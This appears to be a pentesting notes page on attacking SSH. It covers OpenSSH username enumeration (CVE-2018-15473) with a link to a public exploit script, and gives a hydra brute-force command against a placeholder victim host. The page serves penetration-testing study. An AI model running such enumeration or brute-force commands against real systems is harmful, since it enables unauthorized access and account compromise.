TurboWindX
  • Welcome
  • Hacking Methodologies
    • Known Tools & Technologies
    • Kill Chain
    • Phyisical and hardware
      • Full Screen Escape
  • Checklist - WebApps
  • Checklist - Windows
  • External Recon
    • Ports & services scanning
    • Web Recon
      • CMS
        • Wordpress
      • Path traversal & LFI/RFI
      • XSS - Cross site scripting
      • XML External Entity - XXE
  • Internal Recon
    • Active Directory
  • Post Exploitation
    • Container/Sandbox Breakout
    • Privilege Escalation
      • Hashing & Cracking
    • Persistence
      • Windows
    • Data Exfiltration
      • Steganography
      • Pivot & Tunneling
  • Shells
  • Protocols
    • FTP
    • SSH
    • DNS
    • IPP
  • Binary Exploitation
    • Linux - Simple reverse & crack
  • Memory Analysis
  • Forensics
  • Android & iOS
  • Database Injection & Exploitation
  • DDoS
  • Kubernetes & Docker
  • Phish
Powered by GitBook
On this page
  • OpenSSH 2.3 < 7.7 - Username Enumeration - CVE-2018-15473
  • Brute Force

Was this helpful?

  1. Protocols

SSH

PreviousFTPNextDNS

Last updated 3 years ago

Was this helpful?

OpenSSH 2.3 < 7.7 - Username Enumeration - CVE-2018-15473

You can either use: nmap, msf module or any git scripts to accomplish this. I personally use msf.

There is this python script available:

Brute Force

hydra -l admin -P wordlist.txt victim_ip -t 4 ssh

https://raw.githubusercontent.com/epi052/cve-2018-15473/master/ssh-username-enum.py